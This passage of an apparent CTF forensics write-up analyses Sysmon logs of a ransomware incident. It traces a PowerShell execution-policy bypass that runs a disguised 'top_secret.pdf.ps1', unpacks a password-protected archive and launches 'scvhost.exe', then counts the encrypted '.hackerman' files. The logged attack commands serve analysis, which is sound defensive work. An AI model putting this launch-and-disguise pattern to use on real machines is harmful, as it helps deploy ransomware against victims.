class="o">}</span><span class="s2">","</span><span class="m">510624</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span 
class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:01.639<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:28:00.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,"</span>SYSTEM<span class="s2">","</span>User<span class="s2">",,"</span>Process Create <span class="o">(</span>rule: ProcessCreate<span class="o">)</span><span class="s2">","</span>Microsoft-Windows-Sysmon/Operational<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>Microsoft Corporation<span class="s2">",,"</span>E:<span class="se">\"</span>,<span class="s2">"Windows PowerShell"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:28:01"</span>,<span class="s2">"INFO"</span>,<span class="s2">"10.0.17763.1 (WinBuild.160101.0800)"</span>,<span class="s2">"01DNRXB4M2QN12SYTBJM471EHC"</span>,,,<span class="s2">"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F"</span>,<span class="s2">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span 
class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:00.767\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"PowerShell.EXE"</span>,<span class="s2">"C:\Windows\Explorer.EXE"</span>,<span class="s2">"C:\Windows\explorer.exe"</span>,<span class="s2">"{6b71f96b-c4e5-5d8d-0000-001074f30a00}"</span>,<span class="s2">"5320"</span>,,<span class="s2">"{6b71f96b-c810-5d8d-0000-0010eeae3600}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"Microsoft® Windows® Operating System"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"510093"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:00.767"</span>,<span class="s2">"5"</span>
<span class="s2">"2019-09-27T08:28:00.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"C:\Windows"</span>,<span class="s2">"Console Window Host"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:28:01"</span>,<span class="s2">"INFO"</span>,<span class="s2">"10.0.17763.1 (WinBuild.160101.0800)"</span>,<span class="s2">"01DNRXB4MHZ0RCMJMTRQPT1XRX"</span>,,,<span class="s2">"SHA1=A32A03532A2AC2CA9C9F67FF4E7FB45680985DF9,MD5=4C41666923A14DC687DEEE3B143AFB55,SHA256=4DD0F069254FE5577D5A478B70093049B4E062BB7760094E50090F6790456DAE,IMPHASH=76923AA1BF85799F169FC2A8BB03894A"</span>,<span class="s2">"C:\Windows\System32\conhost.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:00.778\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"CONHOST.EXE"</span>,<span class="s2">"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; &amp; 'E:\top_secret.pdf.ps1'"""</span>,<span class="s2">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"</span>,<span class="s2">"{6b71f96b-c810-5d8d-0000-0010eeae3600}"</span>,<span class="s2">"9072"</span>,,<span class="s2">"{6b71f96b-c810-5d8d-0000-00101bb03600}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"Microsoft® Windows® 
Operating System"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"510113"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:00.778"</span>,<span class="s2">"5"</span>
<span class="s2">"2019-09-27T08:28:00.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,,,,<span class="s2">"Process Creation"</span>,<span class="s2">"Security"</span>,<span class="s2">"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; &amp; 'E:\top_secret.pdf.ps1'"""</span>,,,,,,,<span class="s2">"4688"</span>,<span class="s2">"2019-09-27 10:28:02"</span>,<span class="s2">"AUDIT_SUCCESS"</span>,,<span class="s2">"01DNRXB5S8Z2H46S6EW7E5ZD4Q"</span>,,,,,,,<span class="s2">"-9214364837600034816"</span>,<span class="s2">"6"</span>,,,<span class="s2">"A new process has been created.\\r\\n\\r\\nCreator Subject:\\r\\n Security I"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,,,,,,,,<span class="s2">"4"</span>,,,<span class="s2">"{54849625-5478-4994-A5BA-3E3B0328C30D}"</span>,<span class="s2">"66720"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Security-Auditing"</span>,,,,,<span class="s2">"DESKTOP-F5ERMDT"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"robert"</span>,<span class="s2">"S-1-5-21-4014005275-3135484918-1388781346-1001"</span>,,,,,,<span class="s2">"13312"</span>,,<span class="s2">"1800"</span>,,,,,<span class="s2">"2"</span>
<span class="s2">"2019-09-27T08:28:11.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""E:\scvhost.exe"""</span>,<span class="s2">"?"</span>,,<span class="s2">"E:\","</span>?<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:12<span class="s2">","</span>INFO<span class="s2">","</span>?<span class="s2">","</span>01DNRXBFGMQ28DXDKZ2H3KNJJE<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>AB46FD10A9562CDDA95B0EB5DD475BC5E41DA55E,MD5<span class="o">=</span>79F0ED40895935BFF57D763B63B77DA2,SHA256<span class="o">=</span>F20AC7A598D2BDC4FE4F1936BFCB5C0A0406A4E66D292578783B77552F7E5F3C,IMPHASH<span class="o">=</span>FC40519AF20116C903E3FF836E366E39<span class="s2">","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.717<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>?<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span 
class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">9072</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c81b-5d8d-0000-0010ed433700<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>?<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">511649</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.717<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
</code></pre></div>
<p>But among these entries there was nothing resembling file modifications, apart from the creation of a shortcut to <code>top_secret.pdf.ps1</code> in <code>C:\Users\robert\AppData\Roaming\Microsoft\Windows\Recent</code>.</p>
<p>We then looked at the processes created by <code>top_secret.pdf.ps1</code>:</p>
<div class="highlight"><pre><span></span><code>$ grep -E <span class="s1">'Process Create.*top_secret.pdf.ps1'</span> logs.csv
<span class="s2">"2019-09-27T08:28:01.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&amp; 'C:\Program Files\7-Zip\7z.exe' x .\robber.pdf.7z -pazerty -aoa"""</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"E:\","</span>Windows PowerShell<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:02<span class="s2">","</span>INFO<span class="s2">","</span><span class="m">10</span>.0.17763.1 <span class="o">(</span>WinBuild.160101.0800<span class="o">)</span><span class="s2">","</span>01DNRXB6012401ETD2VY33ZBRB<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5<span class="o">=</span>7353F60B1739074EB17C5F4DDDEFE239,SHA256<span class="o">=</span>DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH<span class="o">=</span>741776AACCFC5B71FF59832DCDCACE0F<span class="s2">","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 
<span class="m">08</span>:28:01.639<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>PowerShell.EXE<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">9072</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c811-5d8d-0000-00105ae93600<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>Microsoft® Windows® Operating System<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">510624</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span 
class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:01.639<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:28:00.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,"</span>SYSTEM<span class="s2">","</span>User<span class="s2">",,"</span>Process Create <span class="o">(</span>rule: ProcessCreate<span class="o">)</span><span class="s2">","</span>Microsoft-Windows-Sysmon/Operational<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>Microsoft Corporation<span class="s2">",,"</span>E:<span class="se">\"</span>,<span class="s2">"Windows PowerShell"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:28:01"</span>,<span class="s2">"INFO"</span>,<span class="s2">"10.0.17763.1 (WinBuild.160101.0800)"</span>,<span class="s2">"01DNRXB4M2QN12SYTBJM471EHC"</span>,,,<span class="s2">"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F"</span>,<span class="s2">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span 
class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:00.767\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"PowerShell.EXE"</span>,<span class="s2">"C:\Windows\Explorer.EXE"</span>,<span class="s2">"C:\Windows\explorer.exe"</span>,<span class="s2">"{6b71f96b-c4e5-5d8d-0000-001074f30a00}"</span>,<span class="s2">"5320"</span>,,<span class="s2">"{6b71f96b-c810-5d8d-0000-0010eeae3600}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"Microsoft® Windows® Operating System"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"510093"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:00.767"</span>,<span class="s2">"5"</span>
<span class="s2">"2019-09-27T08:28:00.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"C:\Windows"</span>,<span class="s2">"Console Window Host"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:28:01"</span>,<span class="s2">"INFO"</span>,<span class="s2">"10.0.17763.1 (WinBuild.160101.0800)"</span>,<span class="s2">"01DNRXB4MHZ0RCMJMTRQPT1XRX"</span>,,,<span class="s2">"SHA1=A32A03532A2AC2CA9C9F67FF4E7FB45680985DF9,MD5=4C41666923A14DC687DEEE3B143AFB55,SHA256=4DD0F069254FE5577D5A478B70093049B4E062BB7760094E50090F6790456DAE,IMPHASH=76923AA1BF85799F169FC2A8BB03894A"</span>,<span class="s2">"C:\Windows\System32\conhost.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:00.778\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"CONHOST.EXE"</span>,<span class="s2">"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; &amp; 'E:\top_secret.pdf.ps1'"""</span>,<span class="s2">"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"</span>,<span class="s2">"{6b71f96b-c810-5d8d-0000-0010eeae3600}"</span>,<span class="s2">"9072"</span>,,<span class="s2">"{6b71f96b-c810-5d8d-0000-00101bb03600}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"Microsoft® Windows® 
Operating System"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"510113"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:00.778"</span>,<span class="s2">"5"</span>
<span class="s2">"2019-09-27T08:28:11.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""E:\scvhost.exe"""</span>,<span class="s2">"?"</span>,,<span class="s2">"E:\","</span>?<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:12<span class="s2">","</span>INFO<span class="s2">","</span>?<span class="s2">","</span>01DNRXBFGMQ28DXDKZ2H3KNJJE<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>AB46FD10A9562CDDA95B0EB5DD475BC5E41DA55E,MD5<span class="o">=</span>79F0ED40895935BFF57D763B63B77DA2,SHA256<span class="o">=</span>F20AC7A598D2BDC4FE4F1936BFCB5C0A0406A4E66D292578783B77552F7E5F3C,IMPHASH<span class="o">=</span>FC40519AF20116C903E3FF836E366E39<span class="s2">","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.717<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>?<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span 
class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">9072</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c81b-5d8d-0000-0010ed433700<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>?<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">511649</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.717<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
</code></pre></div>
<p>And we see that it runs another file present on the USB key: scvhost.exe, whose name closely resembles a native Windows process, svchost.exe (Service Host).</p>
<p>Searching the log entries for this process, we notice a large number of FileCreate events with ordinary file names to which the <code>.hackerman</code> extension has been appended (e.g. <code>C:\Users\robert\Pictures\Lighthouse.jpg.hackerman</code>).</p>
<p>We deduced that these were the files encrypted by the ransomware.</p>
<p>To count them, <code>grep</code> and <code>wc</code> are enough:</p>
<div class="highlight"><pre><span></span><code>$ grep -E <span class="s1">'FileCreate.*\.hackerman\"'</span> logs.csv <span class="p">|</span> wc -l
<span class="m">2779</span>
$ grep -E <span class="s1">'FileCreate.*\.hackerman\"'</span> logs.csv <span class="p">|</span> wc -l <span class="p">|</span> tr --delete <span class="s1">'\n'</span> <span class="p">|</span> sha1sum <span class="p">|</span> sed -E <span class="s1">'s/^(.)(.*)(.) -/ECW{\1\2\3}/'</span>
ECW<span class="o">{</span><span class="m">958</span>...72b<span class="o">}</span>
</code></pre></div>
<h1>Persistence</h1>
<p>Unfortunately we did not have time to find this last flag during the CTF, but here is its solution anyway.</p>
<p>Since we had found that most of the ransomware's logic lives in the scvhost.exe program, we looked for the processes created by scvhost.exe:</p>
<div class="highlight"><pre><span></span><code>$ grep -E <span class="s1">'Process Create.*scvhost.exe'</span> logs.csv <span class="p">|</span> grep -v <span class="s1">'top_secret.pdf.ps1'</span>
<span class="s2">"2019-09-27T08:28:12.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""E:\scvhost.exe"""</span>,<span class="s2">"?"</span>,,<span class="s2">"E:\","</span>?<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:13<span class="s2">","</span>INFO<span class="s2">","</span>?<span class="s2">","</span>01DNRXBGJ64GV4QYSY9QHDF8Q6<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>AB46FD10A9562CDDA95B0EB5DD475BC5E41DA55E,MD5<span class="o">=</span>79F0ED40895935BFF57D763B63B77DA2,SHA256<span class="o">=</span>F20AC7A598D2BDC4FE4F1936BFCB5C0A0406A4E66D292578783B77552F7E5F3C,IMPHASH<span class="o">=</span>FC40519AF20116C903E3FF836E366E39<span class="s2">","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:12.226<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>?<span class="s2">","""</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">""","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">","</span><span 
